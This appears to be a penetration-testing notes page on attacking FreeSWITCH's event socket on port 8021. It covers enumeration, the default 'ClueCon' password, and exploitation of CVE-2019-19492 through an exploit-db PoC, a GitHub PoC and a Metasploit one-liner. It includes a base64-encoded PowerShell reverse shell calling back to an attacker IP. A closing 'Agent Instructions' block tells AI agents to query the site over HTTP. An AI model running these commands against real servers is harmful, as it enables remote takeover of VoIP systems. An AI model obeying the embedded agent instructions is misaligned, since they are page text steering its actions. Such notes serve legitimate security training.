# 8021 - FreeSWITCH `FreeSWITCH` is an open-source VoIP platform commonly used for PBX systems, SIP trunking, and conferencing services. The `mod_event_socket` module in FreeSWITCH opens a TCP socket—typically on port `8021`—which allows external applications to communicate with the switch using a command/response protocol. This interface should **never be exposed externally** without robust access controls. If an attacker guesses or knows the `event_socket_password`—which defaults to `ClueCon` in many installations—they can authenticate and issue commands to the FreeSWITCH server. With successful authentication, an attacker could list and manage calls, inject audio or messages, execute arbitrary dial plans, and potentially escalate privileges further depending on the system's configuration. ## Enumeration ```bash # TCP scan with nmap PORT STATE SERVICE VERSION 8021/tcp open freeswitch-event FreeSWITCH mod_event_socket # Manual service probbing $ nc -nv 192.168.244.151 8021 (UNKNOWN) [192.168.244.151] 8021 (zope-ftp) open Content-Type: auth/request ... Content-Type: text/disconnect-notice Content-Length: 67 Disconnected, goodbye. See you at ClueCon! http://www.cluecon.com/ ``` Upon probing with `nc`, the connection to the port succeeds and returns the message: `Content-Type: auth/request`, indicating that `FreeSWITCH` is prompting for a password. Authentication is usually performed using the command `auth `. If the password is correct, the server responds with `Content-Type: command/reply Reply-Text: +OK accepted`. ## Attacks ```bash # Check default credentials $ creds search freeswitch +------------+----------+----------+ | Product | username | password | +------------+----------+----------+ | freeswitch | | ClueCon | +------------+----------+----------+ ``` FreeSWITCH versions `1.6.10` through `1.10.1` are **vulnerable to RCE** ([CVE-2019-19492](https://nvd.nist.gov/vuln/detail/CVE-2019-19492)) due to a hardcoded default password (`ClueCon`) in the `event_socket.conf.xml` file. If unchanged, this allows remote attackers to authenticate to the Event Socket interface and execute arbitrary system commands through the FreeSWITCH service, making it a critical entry point for compromising VoIP infrastructure. The default configuration files for FreeSwitch are under `/etc/freeswitch/autoload_configs/`: {% code overflow="wrap" %} ```bash # Recurvise, case-insensitive search $ grep -Ri password $ cat event_socket.conf.xml | grep password ``` {% endcode %} {% tabs %} {% tab title="47799" %} [PoC](https://www.exploit-db.com/exploits/47799) from 1F98D on exploit-db: {% code overflow="wrap" %} ```bash # Search PoC $ searchsploit FreeSwitch ​ Exploit Title | Path ------------------------------------------------------------------------------- FreeSWITCH 1.10.1 - Command Execution | windows/remote/47799.txt ​ # Download PoC $ searchsploit -m 47799 ​ # Rename PoC file $ mv 47799.txt 47799.py ​ # Execute PoC for RCE $ python3 47799.py gust whoami ​# Execute PoC for reverse shell # https://www.revshells.com/ - PowerShell #3 (Base64) $ python3 47799.py gust "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA2ACIALAA4ADAAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" ``` {% endcode %} {% endtab %} {% tab title="Chocapikk PoC" %} This [PoC](https://github.com/Chocapikk/CVE-2019-19492) allows easy exploitation of the above vulnerability: ```bash $ uv run exploit.py --target # id ``` {% endtab %} {% tab title="MSF" %} A [Metasploit module](https://www.rapid7.com/db/modules/exploit/multi/misc/freeswitch_event_socket_cmd_exec/) exists for the above RCE vulnerability: {% code overflow="wrap" %} ```bash msf > use exploit/multi/misc/freeswitch_event_socket_cmd_exec msf exploit(freeswitch_event_socket_cmd_exec) > show targets Exploit targets: ================= Id Name -- ---- => 0 Unix (In-Memory) 1 Linux (Dropper) 2 PowerShell (In-Memory) 3 Windows (In-Memory) 4 Windows (Dropper) msf exploit(freeswitch_event_socket_cmd_exec) > set TARGET msf exploit(freeswitch_event_socket_cmd_exec) > show options msf exploit(freeswitch_event_socket_cmd_exec) > exploit # Inline command sudo msfconsole -q -x "use exploit/multi/misc/freeswitch_event_socket_cmd_exec; set TARGET 3; set RHOSTS ; set LHOST tun0; run;" ``` {% endcode %} {% endtab %} {% endtabs %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://x7331.gitbook.io/boxes/services/tcp/freeswitch-8021.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.